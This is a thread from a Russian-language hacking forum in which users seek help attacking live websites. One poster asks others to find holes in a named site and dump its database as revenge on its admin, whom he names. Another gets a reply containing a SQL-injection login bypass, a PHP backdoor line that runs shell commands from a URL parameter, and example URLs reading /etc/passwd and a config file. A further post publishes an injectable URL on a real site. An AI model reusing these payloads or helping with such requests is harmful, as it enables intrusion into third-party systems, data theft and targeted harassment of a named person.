HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #191  
Старый 19.08.2012, 01:00
Syndicate
Постоянный
Регистрация: 28.04.2012
Сообщений: 462
С нами: 7389686

Репутация: -6
По умолчанию

Помогите пожалуйста,поищите дыры на этом сайте: http://icq-halyava.com/ сайт самописка,кто найдёт дыры или способ как можно бд слить отпишитесь в теме пожалуйста, просто админ этого сайта кинул меня на большие деньги, админа кстате зовут Юрий Корнилов так же известный под логином yirik24 вообшем кто чем может помочь по этому сайту отпишитесь
 
Ответить с цитированием

  #192  
Старый 19.08.2012, 01:00
aim+faster
Познающий
Регистрация: 04.05.2011
Сообщений: 86
С нами: 7908086

Репутация: 7
По умолчанию

delete
 
Ответить с цитированием

  #193  
Старый 19.08.2012, 01:00
kir2914
Познающий
Регистрация: 08.01.2011
Сообщений: 34
С нами: 8075126

Репутация: 0
По умолчанию

Недавно просканировал Xspiderom один сайтик и нашел уязвимость "Удаленное выполнение команд" на порту 8080. IMAGE http://imglink.ru/pictures/19-08-12/ca81f43e385ebe1160ef00cf7c0761d1.jpg
Насколько я понимаю, уязвимость серьезная. Только вот, что делать? Как ее использовать?
 
Ответить с цитированием

  #194  
Старый 19.08.2012, 01:00
drmorgan
Постоянный
Регистрация: 02.02.2010
Сообщений: 466
С нами: 8564726

Репутация: 52
По умолчанию

Цитата:

Сообщение от kir2914

Недавно просканировал Xspiderom один сайтик и нашел уязвимость "Удаленное выполнение команд" на порту 8080. IMAGE http://imglink.ru/pictures/19-08-12/ca81f43e385ebe1160ef00cf7c0761d1.jpg
Насколько я понимаю, уязвимость серьезная. Только вот, что делать? Как ее использовать?

Она позволяет удаленному пользователю выполнить команды операционной системы на целевой системе. Сценарии 'add_comments.php' и 'functions.php' не проверяют данные, представленные пользователем. Удаленный пользователь может послать специально обработанные данные, чтобы создать произвольный файл с произвольным расширением и произвольным содержанием. Удаленный пользователь может эксплуатировать эту уязвимость, чтобы загрузить PHP файл и затем заставить Web сервер выполнить PHP код.
 
Ответить с цитированием

  #195  
Старый 19.08.2012, 01:00
kir2914
Познающий
Регистрация: 08.01.2011
Сообщений: 34
С нами: 8075126

Репутация: 0
По умолчанию

Ок. Как это реализовать?
 
Ответить с цитированием

  #196  
Старый 19.08.2012, 01:00
drmorgan
Постоянный
Регистрация: 02.02.2010
Сообщений: 466
С нами: 8564726

Репутация: 52
По умолчанию

Цитата:

Сообщение от kir2914

Ок. Как это реализовать?

Это инъекция , посмотри на форуме тут полно статей, тут в двух словах не отпишешся надо целую статью писать.

Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды на целевой системе.

Пример:

user: ' or isnull(1/0) /*
pass: whatever

Получив административные привилегии, злоумышленник может отредактировать специальным образом глобальный шаблон '/templates/tpl_global.php'.

Пример:

//***********************************************

TEMPLATE;
}
}
system($HTTP _GET_VARS[command]);

И, затем, с помощью специально сформированного URL выполнить произвольные команды на целевой системе с привилегиями web сервера.

Примеры:

http://[target]/[path]//templates/tpl_global.php?command=ls%20-la

http://[target]/[path]/templates/TPL_GLOBAL.PHP?command= cat%20/etc/passwd

http://[target]/[path]/templates/TPL_GLOBAL.PHP?command= cat%20/[path_to_config_file]/data.inc.php
 
Ответить с цитированием

  #197  
Старый 24.08.2012, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

Какая нахрен SQL инъекция, ты наркоман что ли? Откуда вообще этот текст скопировал?
Там чёрным по белому написано, что на сервере возможно уязвимая версия апача. Даже ссылка на CVE соответствующий есть. Гугли сплойт.
 
Ответить с цитированием

  #198  
Старый 01.09.2012, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

Всё так, нет тут никакой скули.
 
Ответить с цитированием

  #199  
Старый 01.09.2012, 01:00
Kkopai
Новичок
Регистрация: 05.01.2011
Сообщений: 5
С нами: 8079446

Репутация: 0
По умолчанию

Выкладываю Sql Injection в паблик. http://kb.arena.ru/npc_desc.php?r=1+1
Подскажите можно ли с ней что-то сделать ? Я как не пытался не выходит
 
Ответить с цитированием

  #200  
Старый 01.09.2012, 01:00
SpAcE_MaN26
Постоянный
Регистрация: 31.03.2011
Сообщений: 511
С нами: 7957046

Репутация: 12


По умолчанию

Так это же просто предупреждения php!
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.